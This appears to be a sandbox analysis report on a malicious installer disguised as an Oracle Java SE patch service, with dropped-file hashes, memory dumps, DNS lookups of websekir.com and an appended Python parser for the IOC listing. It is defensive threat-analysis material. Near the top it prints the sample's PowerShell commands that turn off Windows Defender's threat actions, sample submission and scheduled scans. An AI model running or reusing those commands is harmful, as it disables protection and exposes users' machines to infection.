C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 repository.certum.pl udp
GB 2.18.63.21:80 repository.certum.pl tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 5.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 websekir.com udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 websekir.com udp
US 8.8.8.8:53 websekir.com udp
US 8.8.8.8:53 websekir.com udp
N/A 127.0.0.1:50543 N/A tcp
N/A 127.0.0.1:50551 N/A tcp
N/A 127.0.0.1:50553 N/A tcp
N/A 127.0.0.1:50556 N/A tcp
US 8.8.8.8:53 websekir.com udp
N/A 127.0.0.1:50559 N/A tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6C27B6DA8C60D333DD161137481B772E_8D2705640D941B859369EC71AB80665B

MD5 3d3ac8653b5eeb7eaba019b50df5f3d0
SHA1 57dfe18b28a76cfadb4cc80f53d559cf8868728d
SHA256 e7a9369455a1f1f355faf65b0bb322ffc40741d19df44b2a982cd69f0322709a
SHA512 8d37b115a91b960ce47504e03bff45ae6bbdf1cec782cf6a69ea348fb91845adda04761a067d26df36ba322b4d784bf7ee2fac76db9cc5334db14e3059d6458c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6C27B6DA8C60D333DD161137481B772E_8D2705640D941B859369EC71AB80665B

MD5 e8506a7a82d6d66cb76937576ae2eda7
SHA1 a3cb771a9a410caaf4e9bb527d02254d41d3169d
SHA256 eb33b432e411b73f127bac67178fd05c9336fcf444973c8e8dcf997fc711bd7d
SHA512 8eea374485b45af2b50870ee58fd91b7275e050782df5c506e91d3e77c77e68dabf1bbc970d6ddc35a4fc1ea8d4d93900954b64e2303d471354305d2089ae12b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\68FAF71AF355126BCA00CE2E73CC7374_2FC60472190717C9030A3B22E7C17DF4

MD5 7fa35b9b26d35986602214ca1a5a8123
SHA1 300297298df1d3bd5b5c0c1c5bb782132bc98df2
SHA256 70497b384024f1c0d6950a75f41cfed50292ac8408cd47b47e04b7c375358486
SHA512 df5edae4399b49fc522a54f5e3cfc287dce17cf3d66103d361f56fd289894dfde258b42266e5837505ef1ea9ab440625129ebfafd41775a32652837014190da6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\68FAF71AF355126BCA00CE2E73CC7374_2FC60472190717C9030A3B22E7C17DF4

MD5 d67d0ea2202bf0994c7d74e568bb241d
SHA1 1aa2f3b799b490e5ec7d538995d7e459094134eb
SHA256 afe0fcf076f4a87deac1a79d1624f7d5bcf2fd79168eb073ddfd8128c77f6802
SHA512 48f4ef76389f47ba5404edfad362236185a5edfecb772f520078d1554daab797dac97f432a2367895e81d1da63a8ba3d3c075fca704f55dc9780af300e9e84fb

C:\Windows\Installer\MSI77C1.tmp

MD5 a3ae5d86ecf38db9427359ea37a5f646
SHA1 eb4cb5ff520717038adadcc5e1ef8f7c24b27a90
SHA256 c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74
SHA512 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe

MD5 a27bdbc102aa90a99bc5538bb271b4d3
SHA1 eb18ea9eee793aa76eab49feea0e6490c4ded61e
SHA256 e85b4b2991b3772ab7bfaf0012fe5dfd754fd0c3661466e556b20f5ca8f2b4de
SHA512 cc0cbdc74b419a77f8250cd80f68af5b227383ee904707187b8971d3ed478cb80edcf7ab27390e34be65b599fb214925577afecc6e82d41db9000c50f71da421

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140.dll

MD5 e008fbfdea1bf873f3d94d74c1cf7935
SHA1 2a2af5e9084e7b55cdd5d01df342b02c1917573c
SHA256 678f9d715220512a823ca45d7e8545a1288728d8d47243e072e17049441cdd2b
SHA512 145acb67ab06dc90e5c7ed89623a339f595998af683bf47d665ffa23b05f9b87016b3ae5777c2c45f53b91a757e510b0f5aa5a9b908d79df3d566b2307d9d3d0

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140_1.dll

MD5 1e109b1d40efcfec81a5d43d318cbb26
SHA1 03aae193dc36d70fb34257d1276666e988b4a222
SHA256 0f04b4cb12543687d8416dfc307593a1dbc450939fd7980d124fed4144732d69
SHA512 762bb0fa8528936c8cfbd05e8beb557b9d751f3850124b3dcec102e3cd55550408666ffb27fea5472420ea40d95453279769765eee8f94ed2afa3d721018e1c4

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\MSVCP140.dll

MD5 9dda681b0406c3575e666f52cbde4f80
SHA1 1951c5b2c689534cdc2fbfbc14abbf9600a66086
SHA256 1ecd899f18b58a7915069e17582b8bf9f491a907c3fdf22b1ba1cbb2727b69b3
SHA512 753d0af201d5c91b50e7d1ed54f44ee3c336f8124ba7a5e86b53836df520eb2733b725b877f83fda6a9a7768379b5f6fafa0bd3890766b4188ebd337272e9512

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll

MD5 888aa12cc20f645dd2fc04f52e453bc6
SHA1 b19e790c9e6ceface9cdd41a24518d6e4a953b23
SHA256 93e2aa20251e1a0485828c3e29b60e17ff2f3ec1285455d059ffe1b1a24518eb
SHA512 f7d7a67244ff4f9a269461b49cdcd44d923840154447ca7ace61ef8167b79605c2f3c29a1d607b44831e68a696ef219710c4f1658a6fa73e564b7f252b031dc3

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll

MD5 b3c188281aa3998f49391da0c3b52b8e
SHA1 67e6f1eb07861dddde3df9d266f683cb0331d433
SHA256 59481427f4dad6460ac60c7619f628d6b7fad33562bbd8dc9145715ebb300e46
SHA512 42d7a71d4ce1e0c6ea50ddbf960b6f0d25b32526604295f50688bf4770db7338d4b32f0dda738ae147def66788497537f708becdeb720e299c614c28fe824665

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat

MD5 0a16033c7df6ba580e33c66fed1a12d7
SHA1 50fc0b9f740a9e82717f2370fe0a15e937a84208
SHA256 08d68557b06a5cb43ce2719bf82dd2fee6bd78a58c88a37e5ee5d54b2ea14623
SHA512 c252e11099d52bc57bd49ce5732a7cd5fcbd155b36e0b0b27a3e8a3023949708362e4156e09f467b35c27543a652173a8dbe29da13dbdb23ecd2354c95569b44

memory/1800-84-0x0000000003110000-0x0000000003146000-memory.dmp

memory/5080-85-0x0000000004FB0000-0x00000000055D8000-memory.dmp

memory/2472-86-0x00000000057A0000-0x00000000057C2000-memory.dmp

memory/5080-88-0x0000000005750000-0x00000000057B6000-memory.dmp

memory/5080-87-0x00000000055E0000-0x0000000005646000-memory.dmp

memory/5080-89-0x0000000005870000-0x0000000005BC4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rixc2b3o.31x.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2472-117-0x0000000006870000-0x000000000688E000-memory.dmp

memory/2472-118-0x0000000006890000-0x00000000068DC000-memory.dmp

memory/2472-121-0x0000000070740000-0x000000007078C000-memory.dmp

memory/5080-119-0x0000000006E90000-0x0000000006EC2000-memory.dmp

memory/5080-120-0x0000000070740000-0x000000007078C000-memory.dmp

memory/2472-140-0x0000000006DF0000-0x0000000006E0E000-memory.dmp

memory/5080-141-0x00000000070D0000-0x0000000007173000-memory.dmp

memory/1800-142-0x0000000070740000-0x000000007078C000-memory.dmp

memory/5080-152-0x00000000071F0000-0x000000000720A000-memory.dmp

memory/1800-153-0x0000000008040000-0x00000000086BA000-memory.dmp

memory/5080-154-0x0000000007260000-0x000000000726A000-memory.dmp

memory/1800-155-0x0000000007C90000-0x0000000007D26000-memory.dmp

memory/5080-157-0x00000000073F0000-0x0000000007401000-memory.dmp

memory/1800-156-0x0000000007C00000-0x0000000007C11000-memory.dmp

memory/2472-158-0x0000000007DC0000-0x0000000007DCE000-memory.dmp

memory/5080-159-0x0000000007430000-0x0000000007444000-memory.dmp

memory/5080-160-0x0000000007530000-0x000000000754A000-memory.dmp

memory/1800-161-0x0000000007C80000-0x0000000007C88000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 88b7e09ad647110c38f12c0d75b4f5c8
SHA1 b2e188fd69562cf30374f3d8e4b5f56ff3cd9ca5
SHA256 68262db03eb3905e7225b3863eeef9307c5a81a656053706bcca06d8658be296
SHA512 f9a933492b047d14dcab6a9bd6864b668b36c2ef133bed5ff47ed5b9d59745b172293b96736c71860f64aafd9f44ce1fcffd1ed5b0b7b27b97bd0f05f56192e2

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe

MD5 96b62cfb83cf0e9790a3ef939173ee31
SHA1 23ecaefa21524e9446ea16e1f532f8bf9c5a56f1
SHA256 6fe23163ea43ab8d9e84fed45b8590fe643d599c7f218ea05d505e3aeea86f23
SHA512 d018997c50702fe035bd3974180f274ffa34605bd19a3ce8fbabf96633794afe8f1ee4a2ee731a9ff3c73163e45ad26f8d7bac30b9ae55d1d47c8a333b657b6b

memory/1672-192-0x0000000005C10000-0x0000000005F64000-memory.dmp

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll

MD5 a3ba8128253c2f6bf043d636100d62de
SHA1 f47a211b1d09d75ff820d2c2e2fd9fa0338562a5
SHA256 599f9c72db7ba72b2d13c222f9121d7b564fbd0b401be44bd05a660e43d93bce
SHA512 89f2d39a507a40bbf096fd10816b901c472ce5b184b7de70d9d80c97f42db5029e877201df7abd828c4f475d279617d4e24b673608136659a9602cf14385f5ae

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll

MD5 e7fcab954f116c8bb4b006145c20dd23
SHA1 91ee70a33ab12618f0f0ec229de4583d9aa52a8a
SHA256 e52b21f458c61dab957fea7286544a0c6531a4caf5c97c323eea10a61a0b38b2
SHA512 d5cf56a35697b4afd88721f7c60156fd5b1ef7b659e8fe5e98db79f8fa41b394662bc4182b41af1a5a029ec3b04c909629db83d146683ca382958199f6ea73b9

memory/4600-280-0x0000000006300000-0x000000000634C000-memory.dmp

memory/548-335-0x00007FFBF8C90000-0x00007FFBF9110000-memory.dmp

memory/4600-336-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4600-346-0x00000000074A0000-0x0000000007543000-memory.dmp

memory/1672-347-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/932-367-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/5016-357-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/3140-377-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4056-387-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4556-397-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/3588-417-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/3580-407-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/3460-427-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4328-437-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4600-447-0x00000000077E0000-0x00000000077F1000-memory.dmp

memory/3812-448-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4764-458-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/3484-468-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4600-478-0x0000000007820000-0x0000000007834000-memory.dmp

memory/4420-479-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/4016-489-0x00000000700D0000-0x000000007011C000-memory.dmp

memory/2128-499-0x00000000700D0000-0x000000007011C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 88e30f8e14dda84b7e420941eb5cfd08
SHA1 999c1236d43e908c42e35fdad6a0cbeca0b5c87a
SHA256 b9d45f7479e06d6dcb02482467726fbc43aa738e0605ccc1bd428717fd27c464
SHA512 a009d8266681fd55714e0fe777f9ca3f4be5c0223971deb886b80582c7398231d22bacd2fd970b3348484b986a081ffa839fdb7454a96a9c6f0fb01ca4eef709

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d835855d729ed0ea8515fc7680f8a68b
SHA1 5fe84e9ca05c87c5fa0584498a95c3ab9234e446
SHA256 767ae12a1249e356d5597ac96c80c4df7bcf696214dca6536e0d750c5ce532c3
SHA512 8af7c6179595fd252067f2de18ec4823062951128590a44769477a880c0e14334dc394be85e6ec2ead5bf43936aec34f81447b542081a99a1a32a42082ffe1a3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bc1847cefc1c9c27c95ecd59857d21ac
SHA1 0c756ee8194aca441ef3d2d24017fa9f20176cb9
SHA256 76d940812fbb29a2153bdcf5ca23b6ce4bccca7a0697603823ee32d916f3d9d5
SHA512 d9110155f8f55a3e4bee18ea12b97a15cfec12fb38ab6c643f36d370e0e123811366476b1217b82b248e5ccc0f5bee98376ca33afd2693d9d34dda3ba5f5c9d0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b98526874008796c30f2b4d0d16e0351
SHA1 2a4707b0c18155f53c773c0fba8fab4d323c2c6a
SHA256 f62c5b49cbe710a5ef1ccd22ef8a42b380eb2588ae58088ba6fbb1360001ea5f
SHA512 36f58b3729a07f5cab2f3a2396fdd2fba732a12bc7136104d41d5b6a295b80684259278f891182c9096c84ab095977d1d082e685dfd0d7099dce02cc92ce3ac6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e49232bfd9248f8c4bb9291af3127f26
SHA1 dee61b7b2713003137e0db037c5c49494c6c4272
SHA256 5af059663a12adb9b84cb82ef4520b8b77cce39e50d73bfbe0325babe79d16b8
SHA512 a248b49b18c26b614313f94d067cd61965dadb105163f5812557aac467ba39752d629b24c6493c914c7a463a1d23fbdaa331ff4a1d798974a51ac30dc274a0f2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 90de5738b9e946ce68a2d67e66b45f58
SHA1 15ab9e70b2da772985ba674513ff40251b62799e
SHA256 227fc3c051f3b3dd07bde413f195d701b63a627965c2003d55b8d3ddef950bdc
SHA512 98bbc30ab336b5e1e85ae108e518b3e598859f1033a3a8ae07340fb14f89af02cf52e9a06d281341eaebe47ff6ea16d50e35b306fb398684a3788ae97bf2299c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 92d7d23566905f49a00fe9bd39dd8426
SHA1 83cfc3f1449b54d21cbdd394723ca4e6a4b6a355
SHA256 9eb45000e73503d1ba9b2af51e5216f82b92321b03c2150b5a7f85fbd6f8ef3f
SHA512 c47d257a916028a2e137446ae3429337eafc69056504006cb0b9d298feedd19b974eb2c88f02e17dc2119d6bd0f2c1f9bc11d8a022875a9c573f344dcfa73d3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6eef5e45356ecff70dbfaf70af0c41a4
SHA1 e7bfa64975d94696213799d7aa630739ef9fed68
SHA256 683670fb625bcdd08dbfde6ed96440363959a632bf6249b3853de37620bc5555
SHA512 d00498eb7b198bfa0a1528ad8572b46839413681516a3929929a7af122b870d115dd49edc1d77cf19a95683ea6a0e1cacdeabebecfaec0ac105928886874cab0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f853d6d0fe869dc52d9c5d7873c8219c
SHA1 2805083671f9bc4453de07781d737a5bf45e60e5
SHA256 66945f8b460f9025d5f58ca90bd8b976d41c2f42cba58845feaa78643cefbbec
SHA512 4fcf31aa3a393d9c0ee7dc08bfa3c62bf0862bea1f88b0f3a2286f5293e9e9ed5eeb9a9896f1251fa641080c6ad918b1d2e4e5c0d21b3cc1b94c0b7ed650bd0e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 82111a2f1b6833e37602df207a7bc189
SHA1 19ced181f471d749cc98a303685558bd284155d9
SHA256 a79ba5594439c89db758b486786fc0420184e5f8ec304407173a5dad80aaea46
SHA512 b602b8e53b156d157ad288a12c6d5eba950f5907ea76b4fad6952f27867c2a2118c51c501e0ad1f0477dd07842b989435dc676490bea9bafdcbe9359ee77af97

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d63604e13936ee1e7baa922de6e2524f
SHA1 619478385fb76193a111ea5e2cbda66ea88494bf
SHA256 705e89249150d5cd31bc3b8f5b59527c4962b575d6dedc6429f2f52e2b9d76fe
SHA512 ce64bf0cf7d2660a6e3b344e7176e74c44c12434fbe35ddf764b6980cf38c0222cb8afca1a44a4b1ad78274f263a5404d219cecebab6a194e5b9a382f568c367

C:\Config.Msi\e57762b.rbs

MD5 3064ebd622bb0cec063dfec93c469a92
SHA1 5cc25618f16e07a21ff01422bd63fb2d66ef560c
SHA256 de11bf9c53921ba2f588cf9e9808b01761b2a5b03de2dbae238dc04fa7e8a7f2
SHA512 322693566aa5ac5afcd1dc0ecb19787df102e86076d84133c1067896fade6c7d0be92bb7b602a1466124ec67faeef267a8ccaadbf93b41b2c7acb0ae690d102b

C:\Windows\Installer\e57762a.msi

MD5 4c11285fc4be4ffa97a866fbc13bbd83
SHA1 67230603c53081c6436658c3e7b90048a61cb5ed
SHA256 f8cf786235acc09140f9f2b21f61d2f2886f2592afb814b29bffd5550be849e9
SHA512 4f8654d49aa571890473ffb4743dbeee311efbbec09fec307fbcf4803041c976dde0711a72865820edbc5b94487609622adbd9d7694dc8394eee44a5821ef4e1

memory/548-551-0x00007FFBF8C90000-0x00007FFBF9110000-memory.dmp
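The listing above is raw sandbox output: each dropped-file path is followed by its MD5/SHA1/SHA256/SHA512 lines, with memory-dump references interleaved. The Python below is an added example, not part of the report, that parses that format into IOC records, flags any dropped file whose SHA256 equals the submitted sample's (here the copy Windows Installer cached as C:\Windows\Installer\e57762a.msi, which is why that entry carries the report's own sample hash), and builds a path-to-hash hunt list that keeps distinct contents written to the same path (the several StartupProfileData-NonInteractive entries are different files despite the shared path). The excerpt embedded as input is copied from the listing; the memory-line regex, record names and function names are this example's own.

```python
# Added example (not part of the sandbox report): parse the "Files" listing into
# IOC records. A path line is followed by hash lines; memory dumps are interleaved.
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed input: an excerpt copied from the listing above (SHA512 lines and
# most memory lines left out for brevity; the parser accepts them).
SAMPLE_LISTING = r"""
memory/2472-86-0x00000000057A0000-0x00000000057C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rixc2b3o.31x.ps1
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

memory/548-335-0x00007FFBF8C90000-0x00007FFBF9110000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 88e30f8e14dda84b7e420941eb5cfd08
SHA1 999c1236d43e908c42e35fdad6a0cbeca0b5c87a
SHA256 b9d45f7479e06d6dcb02482467726fbc43aa738e0605ccc1bd428717fd27c464

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 d835855d729ed0ea8515fc7680f8a68b
SHA1 5fe84e9ca05c87c5fa0584498a95c3ab9234e446
SHA256 767ae12a1249e356d5597ac96c80c4df7bcf696214dca6536e0d750c5ce532c3

C:\Windows\Installer\e57762a.msi
MD5 4c11285fc4be4ffa97a866fbc13bbd83
SHA1 67230603c53081c6436658c3e7b90048a61cb5ed
SHA256 f8cf786235acc09140f9f2b21f61d2f2886f2592afb814b29bffd5550be849e9

memory/548-551-0x00007FFBF8C90000-0x00007FFBF9110000-memory.dmp
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")
# memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp  (assumed layout of the dump names)
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)  # algorithm -> lowercase hex digest

@dataclass
class MemoryRegion:
    pid: int
    seq: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start

def parse_listing(text: str):
    """Return (dropped_files, memory_regions) in listing order."""
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            regions.append(MemoryRegion(int(m[1]), int(m[2]), int(m[3], 16), int(m[4], 16)))
            current = None  # a memory line closes the current file's hash block
            continue
        m = HASH_RE.match(line)
        if m:
            algo, digest = m[1], m[2].lower()
            if current is None:
                raise ValueError(f"hash line without a preceding path: {line}")
            if len(digest) != HASH_LEN[algo]:
                raise ValueError(f"{algo} digest of wrong length for {current.path}")
            current.hashes[algo] = digest
            continue
        current = DroppedFile(path=line)  # anything else starts a new file entry
        files.append(current)
    return files, regions

def find_sample_copies(files, sample_sha256: str):
    """Paths whose SHA256 equals the submitted sample's (e.g. the MSI cached by msiexec)."""
    want = sample_sha256.lower()
    return [f.path for f in files if f.hashes.get("SHA256") == want]

def hunt_list(files):
    """path -> sorted SHA256 list; one path may have been written with several contents."""
    out = defaultdict(set)
    for f in files:
        if "SHA256" in f.hashes:
            out[f.path].add(f.hashes["SHA256"])
    return {p: sorted(v) for p, v in out.items()}

if __name__ == "__main__":
    files, regions = parse_listing(SAMPLE_LISTING)
    print(len(files), "files;", len(regions), "memory regions; pids", sorted({r.pid for r in regions}))
    print("sample re-dropped as:", find_sample_copies(files, "f8cf786235acc09140f9f2b21f61d2f2886f2592afb814b29bffd5550be849e9"))
    for path, digests in hunt_list(files).items():
        print(len(digests), "distinct content(s) at", path)
```

Running it against the full listing instead of the excerpt gives the same structure: one path matches the sample hash, the PowerShell StartupProfileData path carries a dozen distinct digests, and the memory regions group by PID so the PowerShell hosts (2472, 5080, 1800 and the later 0x700D0000 loaders) can be told apart from the installer process.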